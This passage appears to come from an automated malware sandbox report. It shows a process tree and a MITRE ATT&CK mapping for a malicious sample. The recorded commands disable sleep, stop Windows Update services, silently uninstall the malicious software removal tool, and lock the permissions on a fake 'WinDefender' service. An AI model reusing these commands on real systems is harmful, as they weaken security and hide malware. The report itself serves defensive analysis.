  2⤵
  - Blocklisted process makes network request
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:5396
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5328
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:5324
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4620
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1116
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2852
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2628
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:3488
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:5512
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:1100
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:4228
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:4468
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:3968

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
1⤵
PID:4820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4520 -ip 4520
1⤵
PID:2776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4520 -ip 4520
1⤵
PID:5824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4520 -ip 4520
1⤵
PID:5276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4520 -ip 4520
1⤵
PID:5448

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
1⤵
PID:4364

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4520 -ip 4520
1⤵
PID:392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4520 -ip 4520
1⤵
PID:5700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4520 -ip 4520
1⤵
PID:6028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4520 -ip 4520
1⤵
PID:5996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4520 -ip 4520
1⤵
PID:2268

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1352

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
1⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
PID:3144

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
1⤵
PID:3592

C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3068

C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5524

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery